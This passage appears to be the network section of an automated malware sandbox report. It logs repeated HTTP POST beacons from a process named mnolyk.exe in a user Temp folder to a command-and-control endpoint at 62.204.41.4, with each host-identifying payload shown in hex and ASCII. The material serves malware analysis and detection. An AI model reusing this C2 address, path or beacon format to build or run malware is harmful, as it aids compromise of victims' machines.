                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:28.442949057 CET | 1013 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:28 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      554 | 192.168.2.7 | 50282 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:28.628160954 CET | 1014 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:28.692078114 CET | 1014 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:28 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      555 | 192.168.2.7 | 50283 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:28.863962889 CET | 1015 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:28.927964926 CET | 1015 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:28 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      556 | 192.168.2.7 | 50284 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:29.098649979 CET | 1016 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:29.162779093 CET | 1016 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:29 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      557 | 192.168.2.7 | 50285 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:29.330319881 CET | 1017 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:29.393243074 CET | 1017 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:29 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      558 | 192.168.2.7 | 50286 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:29.567763090 CET | 1018 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:29.629834890 CET | 1018 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:29 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      559 | 192.168.2.7 | 50287 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:29.798909903 CET | 1019 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:29.862126112 CET | 1019 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:29 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      56 | 192.168.2.7 | 49781 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:11.243043900 CET | 494 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:11.307111025 CET | 495 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      560 | 192.168.2.7 | 50288 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:30.033696890 CET | 1020 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:30.099051952 CET | 1020 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:30 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      561 | 192.168.2.7 | 50289 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:30.269170046 CET | 1021 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:30.333194017 CET | 1021 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:30 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      562 | 192.168.2.7 | 50290 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:30.501538038 CET | 1022 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:30.565505028 CET | 1022 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:30 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      563 | 192.168.2.7 | 50291 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:30.738198042 CET | 1023 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:30.802054882 CET | 1023 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:30 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      564 | 192.168.2.7 | 50292 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:30.970170975 CET | 1024 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:31.033524036 CET | 1024 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:31 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      565 | 192.168.2.7 | 50293 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:31.205771923 CET | 1025 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:31.270173073 CET | 1025 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:31 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      566 | 192.168.2.7 | 50294 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:31.479058981 CET | 1026 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:31.543909073 CET | 1026 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:31 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      567 | 192.168.2.7 | 50295 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:31.730773926 CET | 1027 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:31.795362949 CET | 1027 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:31 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      568 | 192.168.2.7 | 50296 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:31.975155115 CET | 1028 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:32.041707039 CET | 1028 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:32 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      569 | 192.168.2.7 | 50297 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:32.224802017 CET | 1029 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:32.290158987 CET | 1029 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:32 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      57 | 192.168.2.7 | 49782 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:11.473355055 CET | 495 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:11.537575960 CET | 496 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


